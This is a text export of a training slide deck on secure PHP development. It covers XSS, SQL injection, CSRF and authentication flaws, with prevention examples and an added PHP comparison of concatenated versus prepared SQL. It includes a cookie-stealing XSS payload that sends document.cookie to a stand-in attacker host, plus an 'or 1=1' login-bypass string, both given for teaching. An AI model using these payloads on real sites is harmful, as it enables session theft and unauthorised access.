Slide 1

Slide 1 text

Secure PHP Development
Chris Cornutt (@enygma)

Slide 2

Slide 2 text

PHP Dev Years
AppSec Engineer
http://websec.io
http://securingphp.com

Slide 3

Slide 3 text

Goals
- Basic appsec principles
- Vulnerabilities & Exploits
- Hands-on experience
- Tools & Techniques

Slide 4

Slide 4 text

http://bit.ly/owasptop

Slide 5

Slide 5 text

There's no such thing as secure

Slide 6

Slide 6 text

https://github.com/psecio/notch
Notch: A Vulnerable Application

Slide 7

Slide 7 text

https://github.com/psecio/notch
Setup Time
or http://notch.securingphp.com

Slide 8

Slide 8 text

No content

Slide 9

Slide 9 text

XSS: Cross Site Scripting

Slide 10

Slide 10 text

- Injection of content into the page, usually Javascript
- reflected vs stored
- poor output escaping

Slide 11

Slide 11 text

Context
- CSS: style: foo
- Javascript: var name = "";
- HTML: foo
- HTML Attribute: ">foo
- Query value: $url = "http://foo.com?data=".$input

Slide 12

Slide 12 text

Example
?name=alert("xss")

Slide 13

Slide 13 text

Example
xmlhttp = new XMLHttpRequest();
xmlhttp.open('GET', 'http://leethack.php?cookies=' + document.cookie, true);
xmlhttp.send();
Assumes cross-origin policy of

Slide 14

Slide 14 text

Your Turn

Slide 15

Slide 15 text

Prevention #1
Note: This is only for an HTML context

Slide 16

Slide 16 text

Prevention #2
{{ name|e('html') }}
{{ name|e('html_attr') }}
{{ name|e('js') }}
{{ name|e('css') }}
Note: This example requires Twig

Slide 17

Slide 17 text

SQLi: SQL Injection

Slide 18

Slide 18 text

- Injection specific to SQL statements
- expose data
- bypass auth mechanisms
- poor input filtering

Slide 19

Slide 19 text

Example
$sql = 'select id from users where username = "'.$_POST['username'].'" and password = "'.$_POST['password'].'"';
password=" or 1=1; #
select id from users where username = "user1" and password = "" or 1=1; #

Slide 20

Slide 20 text

- addslashes()
- mysql_real_escape_string()
- mysqli_real_escape_string()

Slide 21

Slide 21 text

- addslashes()
- mysql_real_escape_string()
- mysqli_real_escape_string()
X

Slide 22

Slide 22 text

Prepared statements
- PDO
- Mysqli

Slide 23

Slide 23 text

Your Turn

Slide 24

Slide 24 text

Prevention
<?php
// Assumes $db is an existing PDO connection object (the connection setup
// did not survive the export of this slide).
$stmt = $db->prepare('select id from users'
    .' where username = :user'
    .' and password = :pass');
$stmt->execute(array(
    'user' => $_POST['username'],
    'pass' => $_POST['password']
));
$results = $stmt->fetchAll(PDO::FETCH_ASSOC);
?>
Note: This example requires PDO support
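The slide 19 string concatenation and the slide 24 prepared statement side by side, as an added example that is not code from the slides or from Notch. It runs against an in-memory SQLite table, so it assumes the pdo_sqlite extension is loaded; because SQLite does not treat `#` as a comment the way MySQL does, the payload here ends with `--` instead.

```php
<?php
// Added example (not from the slides or Notch): the slide 19 concatenation next
// to the slide 24 prepared statement, run against an in-memory SQLite table so
// the difference is visible offline. Assumes pdo_sqlite is loaded; the slide's
// payload uses MySQL's "#" comment, SQLite needs "--", so that part is adapted.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
$db->exec("INSERT INTO users (username, password) VALUES ('user1', 'secret')");

// Vulnerable (slide 19): untrusted input is spliced into the SQL text.
function loginConcat(PDO $db, string $user, string $pass): array
{
    $sql = "select id from users where username = '" . $user
         . "' and password = '" . $pass . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed (slide 24): placeholders keep the SQL structure and the data apart.
function loginPrepared(PDO $db, string $user, string $pass): array
{
    $stmt = $db->prepare('select id from users'
                       . ' where username = :user'
                       . ' and password = :pass');
    $stmt->execute(['user' => $user, 'pass' => $pass]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input: the slide 19 style payload submitted as the password.
$payload = "' or 1=1 -- ";

// Concatenation: the WHERE clause becomes  password = '' or 1=1 -- '  and the
// query matches a row without the real password being known.
printf("concat:   %d row(s)\n", count(loginConcat($db, 'user1', $payload)));

// Prepared statement: the payload is compared as a literal password value,
// so the structure of the query is unchanged and no row matches.
printf("prepared: %d row(s)\n", count(loginPrepared($db, 'user1', $payload)));
```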

Slide 25

Slide 25 text

CSRF: Cross Site Request Forgery

Slide 26

Slide 26 text

- unvalidated form submission
- on all state changes
- what's the source?
- simple, randomized, for each form

Slide 27

Slide 27 text

Example

Slide 28

Slide 28 text

Example

Slide 29

Slide 29 text

Auth*: Authentication & Authorization

Slide 30

Slide 30 text

- direct object reference (A)
- data access
- dangerous actions
- poor user management

Slide 31

Slide 31 text

Your Turn

Slide 32

Slide 32 text

- plaintext passwords
- no password policy
- overly complex passwords
- password hints

Slide 33

Slide 33 text

No content

Slide 34

Slide 34 text

No content

Slide 35

Slide 35 text

But wait, there’s more…

Slide 36

Slide 36 text

- Security Misconfiguration
- Sensitive Data Exposure
- Components with Known Vulnerabilities
- Unvalidated Redirects and Forwards

Slide 37

Slide 37 text

That's all folks
@enygma
@securingphp
http://securingphp.com